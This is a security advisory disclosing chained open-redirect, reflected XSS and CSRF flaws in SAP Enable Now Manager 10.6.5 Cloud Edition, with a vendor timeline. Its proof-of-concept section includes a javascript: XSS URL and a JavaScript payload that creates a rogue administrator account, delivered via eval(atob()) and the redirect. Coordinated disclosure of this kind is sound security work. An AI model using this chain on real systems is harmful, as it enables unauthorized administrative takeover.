SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect

SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >=======================================================================               title: Multiple Vulnerabilities             product: SAP® Enable Now Manager  vulnerable version: 10.6.5 (Build 2804) Cloud Edition       fixed version: May 2023 Release          CVE number: N/A (cloud)              impact: high            homepage: https://www.sap.com/about.html               found: 2022-10-21                  by: Paul Serban (Eviden)                      Fabian Hagg (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"SAP Enable Now solution provides advanced in-application help andtraining capabilities helping you to improve productivity and useradoption, as well as to increase satisfaction of the end-user experience.Create, maintain, and deliver in-application help, learning materials,and documentation content easily."Source: https://www.sapstore.com/solutions/41243/SAP-Enable-NowBusiness recommendation:------------------------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.SEC Consult recommends to perform a thorough security review conducted bysecurity professionals to identify and resolve potential further criticalsecurity issues.Vulnerability overview/description:-----------------------------------Multiple vulnerabilities were identified that could be chained together inorder to allow a remote, unauthenticated attacker to create new administrativeuser accounts by tricking the victim to click on a malicious link or visita malicious website prepared by the attacker.1) Open Redirect/URL Redirection VulnerabilityThe file download feature of the application contains an unvalidatedparameter value that exposes it to an open redirect vulnerability. Anattacker can create a malicious URL which would redirect the victim toa malicious site, for example, a phishing site convincing the victimto login once again.2) Reflected Cross Site Scripting (XSS)A reflected XSS vulnerability was found affecting the same parameter asused in 1). Due to insufficient input validation and output encoding, anattacker can inject arbitrary HTML or JavaScript code into the generatedserver response, executing it in the browser of the victim. The vulnerability,can be exploited, for example, to create new administrative user accountsin the application, thereby fully compromising the application. Any CSRFprotection can be bypassed by means of this vulnerability.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo implementation of CSRF protection was detected in the application.Using this vulnerability, an attacker can issue requests in the contextof administrative user sessions. This includes critical state changingactions such as user creation or role assignment. Note that in thetest environment the option 'Supported Functions' was set to value'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.Certain configurations require this setting to be enabled, e.g. to allowthe SEN Workflow Approver extension to submit the data on behalf of thelogged-in user to the SAP Enable Now Manager. Without this parameter,the extension will only be able to read the content and workflow information)This indicates that there is an insecure feature which allows the protectionmechanism to be disabled globally. It could not be clarified if this is thedefault setting. In any case, the function should still be enhanced to protectcritical actions such as functions used in user management or role/permissionmanagement even if the mechanism is disabled by configuration.Proof of concept:-----------------1) Open Redirect/URL Redirection VulnerabilityThe public endpoint /resources/open_file.html is vulnerable to anopen redirect via GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.comAfter browsing to the above link, the victim gets redirected towww.sec-consult.com in a new browser window opened by the embeddedcall of function window.open(). Note that both attacker and victimdo not have to be authenticated for successful exploitation.2) Reflected Cross-Site Scripting (XSS)The public endpoint /resources/open_file.html is affected by an XSSvulnerability in GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)After browsing to the above link, the domain property returns thedomain name of the server it was loaded from an alert window withinthe browser of the victim. This proves the successful execution of theinjected JavaScript code. In fact, any kind of JavaScript code couldbe injected by the attacker. Note that both attacker and victim donot have to be authenticated for successful exploitation.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo CSRF protection can be observed in POST requests sent between theclient and server. This includes at least the functions "task creation","user creation", "permission assignment" and "role/group assignment". Notethat this vulnerability appears to only affect systems where the CSRF protectionis disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'in the server settings. Although this setting can be reverted, it is advisedto have the protection enabled for critical operations such as user creationor permission assignment at any time (also when the option is set).Several of the vulnerabilities above can be chained together by anunauthenticated attacker. Considering the types of vulnerabilities,there are multiple exploitation scenarios. In our example we willcreate a link that, when clicked by an administrator victim, willcreate a new admin account. For this attack to work, we first needto gather some information. To create an account, we need to know twoimportant values: the OU and the UID. The OU represents the OrganizationalUnit unique identifier. The UID here represents the unique Group IDof our target group where we want our new user to be added. Performinga simple GET request to endpoint /self/group, both values can beobtained. The following listing shows the server response.------------------------------------------------------------------------------------------------HTTP/1.1 200Cache-Control: no-cache, no-store, must-revalidateExpires: 0Vary: OriginSet-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;Content-Type: text/json;charset=UTF-8Server: SAPConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 396{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086","ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU10C ","active":true}]}}------------------------------------------------------------------------------------------------Finally, in order for the attack to succeed, the attacker needsthe victim (logged in as administrator) to do first a request onthe above endpoint, then a POST request on the endpoint /!/userto actually create the new user account with the administratorrole assigned using the values taken from the previous response.These interactions can be scripted using the following ten linesof JavaScript code.------------------------------------------------------------------------------------------------var req1 = new XMLHttpRequest();req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);req1.withCredentials = true;req1.send();var obj = JSON.parse(req1.responseText).response;for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};var req2 = new XMLHttpRequest();req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);req2.withCredentials = true;req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));------------------------------------------------------------------------------------------------We can base64-encode this payload and pass it to the Javascript eval(atob())function using the XSS vulnerability in the file download feature (seen in 2.).The link could then be shortened to enhance the likelihood of successfulexploitation. This can be achieved, for example, by leveraging the Open Redirectvulnerability (seen in 1.) to redirect the victim to an attacker-controlledwebsite and trigger the above payload, making it an attack more likely tosucceed. If the victim is logged into the application and is part ofthe Administrator group, when they click on this link, a new adminaccount will be instantly created. The attacker then can log in and hasfull control over the application.Vulnerable / tested versions:-----------------------------The following versions of the software were found to be vulnerable during our tests:- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)Vendor contact timeline:------------------------2022-11-08: Contacting vendor via [email protected]: Vendor requested screenshots and steps to reproduce2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce             and screenshots weren't available at that time2022-11-10: Vendor confirmed issues are under review2022-11-18: Contacted vendor to request an update2022-11-18: Vendor confirmed issues are still under review2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to             the Engineering Team2023-02-02: Contacted vendor to request an update2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a             release schedule.2023-02-07: Vendor confirmed fix was deployed to production for ticket no #22801965642023-04-14: Contacted vendor to request update on ticket no #2280196563 fix2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release2023-05-08: Vendor confirmed fix was deployed to production for 22801965632023-09-27: Public release of security advisory.Solution:---------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF P. Serban, F. Hagg / @2023